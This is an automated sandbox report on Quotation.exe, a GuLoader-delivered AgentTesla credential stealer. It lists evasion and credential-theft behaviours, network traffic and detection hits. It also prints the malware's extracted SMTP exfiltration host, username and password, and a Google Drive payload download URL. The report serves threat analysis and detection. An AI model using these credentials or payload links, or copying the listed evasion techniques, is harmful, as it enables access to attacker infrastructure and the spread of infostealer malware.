Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:	Quotation.exe
Analysis ID:	1547059
MD5:	eaad92690f4cc140b25affb391767c48
SHA1:	2f161c2e596eaca3f903f56fc24561c610ce0bcc
SHA256:	6d3bda97722c347d083d7127f23eae6f28e86ee31a8b9b643826a44bdc97be69
Tags:	exesigneduser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Quotation.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: EAAD92690F4CC140B25AFFB391767C48)

Quotation.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: EAAD92690F4CC140B25AFFB391767C48)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2951221358.0000000038161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2951221358.0000000038194000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2183844023.000000000953E000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Quotation.exe PID: 8048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quotation.exe PID: 8048	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 67.23.226.139, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 8048, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49845

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T20:29:00.538849+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49730	TCP
2024-11-01T20:29:40.608953+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49736	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T20:29:54.703324+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49794	172.217.18.14	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Quotation.exe.7620.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Multi AV Scanner detection for submitted file

Source: Quotation.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: Quotation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49827 version: TLS 1.2

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: global traffic

TCP traffic: 192.168.2.4:49845 -> 67.23.226.139:587

Source: Joe Sandbox View	IP Address: 67.23.226.139 67.23.226.139
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

ASN Name: DIMENOCUS DIMENOCUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49794 -> 172.217.18.14:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49736

Source: global traffic

TCP traffic: 192.168.2.4:49845 -> 67.23.226.139:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.showpiece.trillennium.biz

Source: Quotation.exe, 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.showpiece.trillennium.biz
Source: Quotation.exe, 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000000.00000000.1671553900.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000004.00000000.2174095294.0000000000408000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: Quotation.exe, 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://showpiece.trillennium.biz
Source: Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Quotation.exe, 00000004.00000002.2930496341.00000000078F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Quotation.exe, 00000004.00000002.2930496341.00000000078F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/U
Source: Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/M
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T&export=download
Source: Quotation.exe, 00000004.00000002.2930496341.000000000794D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WXkRh02qszeOYcJVHlzPfWfZTAlXiW_T&export=downloadG
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49827 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Quotation.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exe

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Quotation.exe

Source: C:\Users\user\Desktop\Quotation.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_6FC92351	0_2_6FC92351
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_0016E289	4_2_0016E289
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_0016A960	4_2_0016A960
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_00164A98	4_2_00164A98
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_00163E80	4_2_00163E80
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_001641C8	4_2_001641C8
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B147E20	4_2_3B147E20
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B14C220	4_2_3B14C220
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B145648	4_2_3B145648
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B146698	4_2_3B146698
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B14B2BA	4_2_3B14B2BA
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B143108	4_2_3B143108
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B140040	4_2_3B140040
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B142338	4_2_3B142338
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B147740	4_2_3B147740
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B145D83	4_2_3B145D83
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B140037	4_2_3B140037
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B14E440	4_2_3B14E440
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B62197B	4_2_3B62197B
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B621988	4_2_3B621988
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B780448	4_2_3B780448
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_3B784C01	4_2_3B784C01
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 4_2_0016B3B4	4_2_0016B3B4

Source: Quotation.exe

Static PE information: invalid certificate

Source: Quotation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/12@4/4

Source: C:\Users\user\Desktop\Quotation.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\overlays

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\AppData\Local\Temp\nsg3BDE.tmp

Jump to behavior

Source: Quotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Quotation.exe

File read: C:\Users\user\Desktop\Quotation.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

File written: C:\Users\user\Music\antithetic.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Quotation.exe

Static file information: File size 1183256 > 1048576

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2183844023.000000000953E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_6FC92351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FC92351

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 4_2_3B6276D8 push esp; iretd

4_2_3B6276E9

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quotation.exe

